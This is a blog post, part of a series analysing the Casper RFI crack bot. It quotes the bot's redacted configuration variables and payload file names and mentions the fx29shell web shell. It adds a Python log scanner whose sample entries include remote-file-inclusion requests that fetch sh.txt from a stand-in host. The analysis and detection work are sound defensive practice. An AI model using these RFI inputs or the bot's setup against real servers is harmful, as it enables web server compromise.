Aug 22 2010 9:44PM GMT
Posted by: Dan O'Connor
casper perl, casper rfi bot, casper.pl
Casper RFI crack bot – Part 5
Parts of the sh.txt script seem to be pretty old: it calls milw0rm and darkc0de, and both sites are no longer up and have not been for a while.
There are also a few things worth looking into here. The script mentions fx29shell.php, which is a PHP shell that can be loaded onto the system.
It can do all kinds of nasty things to your web server; you can download /etc/passwd, for a start. It is not good if you find this on your system, and it might be a good time to do some Google searches against your domain (while we are talking about it).
So after all of this, it looks like casper.(pl|txt) is the main thing doing all of the work, as you can tell from all of the variables.
$admin = "XXXXX";
$serverircs = array("irc.xxxxx.xxx");
$serverirc = $serverircs[rand(0,count($serverircs) - 1)];
$urldata = "http://xxxxxxx/xxxxxxx/casper/";
$injektor = "sh.txt";
$defacer = "def.txt";
$filepsy = "psy.tar.gz";
$portpsy = "6667";
$fileggdrop = "eggdrop.tar.gz";
$filebotphp = "bot.txt";
$crbots = 2;
$filebotperl = "iso.txt";
$filebotscan = "scan.txt";
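The file names in this variable list, together with fx29shell.php, work as indicators when reviewing web server access logs. The Python sketch below is an added example, not code from the bot or from the original post; it assumes Apache combined-format logs, and the sample log lines, addresses and host names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Payload names from the casper variable list, plus the shell named in sh.txt.
PAYLOAD_NAMES = {"sh.txt", "def.txt", "psy.tar.gz", "eggdrop.tar.gz",
                 "bot.txt", "iso.txt", "scan.txt", "fx29shell.php"}

# client, request target and status of a combined-format entry (assumed format).
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
REMOTE_URL_RE = re.compile(r'(?i)^(?:https?|ftp)://')

def leaf_name(path):
    """Last path component, lower-cased, for comparison with PAYLOAD_NAMES."""
    return path.rsplit("/", 1)[-1].lower()

def classify(line):
    """Return (client, reason, detail) for a suspicious entry, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    parts = urlsplit(target)
    # 1) Inclusion attempt: a parameter whose (decoded) value is a remote URL.
    #    This is a triage signal; legitimate redirect parameters also match.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value.strip()):
            known = leaf_name(urlsplit(value.strip()).path) in PAYLOAD_NAMES
            reason = "rfi-known-payload" if known else "rfi-remote-url"
            return (client, reason, f"{name}={value}")
    # 2) A payload name requested directly and served: the file is on disk.
    if leaf_name(parts.path) in PAYLOAD_NAMES and status == "200":
        return (client, "dropped-file-served", parts.path)
    return None

def scan(lines):
    """Classify every line and keep only the findings, in log order."""
    return [hit for hit in map(classify, lines) if hit is not None]

# Constructed sample entries (documentation addresses, .invalid host).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Aug/2010:21:40:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '198.51.100.7 - - [22/Aug/2010:21:41:13 +0000] "GET /index.php?page=http://example.invalid/casper/sh.txt? HTTP/1.1" 200 1843',
    '198.51.100.7 - - [22/Aug/2010:21:41:20 +0000] "GET /view.php?inc=http%3A%2F%2Fexample.invalid%2Fx%2Fid.txt%3F HTTP/1.1" 404 209',
    '203.0.113.5 - - [22/Aug/2010:21:45:02 +0000] "GET /images/fx29shell.php HTTP/1.1" 200 9211',
    '203.0.113.5 - - [22/Aug/2010:21:45:09 +0000] "GET /scan.txt HTTP/1.1" 404 209',
]

if __name__ == "__main__":
    for client, reason, detail in scan(SAMPLE_LOG):
        print(f"{client:15} {reason:20} {detail}")
```

A "dropped-file-served" finding means the named file exists under the web root and should be handled as a compromise, while the two "rfi-" findings only show that inclusion was attempted.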
In the next section we will take a closer look at casper, now that we have poked around a bit.




